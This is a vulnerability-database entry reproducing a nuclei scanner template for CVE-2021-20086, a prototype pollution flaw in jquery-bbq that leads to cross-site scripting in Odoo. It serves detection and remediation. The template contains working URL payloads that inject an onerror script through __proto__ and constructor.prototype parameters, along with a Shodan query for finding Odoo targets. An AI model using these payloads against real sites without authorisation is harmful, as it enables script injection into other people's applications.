Lucene search
K

Odoo Apps - Cross-Site Scripting via Prototype Pollution

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Prototype pollution in jquery-bbq 1.2.1 enables cross-site scripting in Odoo Apps.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-20086
8 Oct 202516:18
circl
CNNVD
jquery-bbq 安全漏洞
23 Apr 202100:00
cnnvd
CVE
CVE-2021-20086
23 Apr 202118:11
cve
Cvelist
CVE-2021-20086
23 Apr 202118:11
cvelist
EUVD
EUVD-2021-1008
7 Oct 202500:30
euvd
Github Security Blog
Prototype Pollution in jquery-bbq
24 May 202119:51
github
NVD
CVE-2021-20086
23 Apr 202119:15
nvd
OSV
GHSA-7W8J-85WM-6XFQ Prototype Pollution in jquery-bbq
24 May 202119:51
osv
Prion
Buffer overflow
23 Apr 202119:15
prion
Positive Technologies
PT-2021-13764
23 Apr 202100:00
ptsecurity
Rows per page
id: CVE-2021-20086

info:
  name: Odoo Apps - Cross-Site Scripting via Prototype Pollution
  author: 1337rokudenashi
  severity: high
  description: |
    jquery-bbq 1.2.1 contains a prototype pollution caused by improperly controlled modification of object prototype attributes, letting malicious users inject properties into Object.prototype, exploit requires malicious user interaction.
  impact: |
    Attackers can modify Object.prototype, leading to potential security issues like property overwrites and application behavior manipulation.
  remediation: |
    Update to the latest version of jquery-bbq that addresses this vulnerability or apply patches to prevent prototype pollution.
  reference:
    - https://www.tenable.com/security/research/tra-2022-10
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20086
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-20086
    cwe-id: CWE-1321
    epss-score: 0.06104
    epss-percentile: 0.92563
    cpe: cpe:2.3:a:jquery-bbq_project:jquery-bbq:1.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: jquery-bbq_project
    product: jquery-bbq
    shodan-query: html:"Odoo"
  tags: cve,cve2021,odoo,xss,proto,jquery,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?__proto__%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&__proto__%5Bjquery%5D=x"
      - "{{BaseURL}}/?constructor%5Bprototype%5D%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&constructor%5Bprototype%5D%5Bjquery%5D=x"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - '!contains(body, "debug:")'
          - 'contains_all(body, "alert(document.domain)","var odoo =")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220210d62a972165669eab5176950cee1b1ce7f7f99c09459f881e4c541493585600221009e16d812b9c59f42e7ec22bdf70ab55edbca37f59184e08bf27729c726dfb640:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 26.5
CVSS 3.18.8
EPSS0.06104
22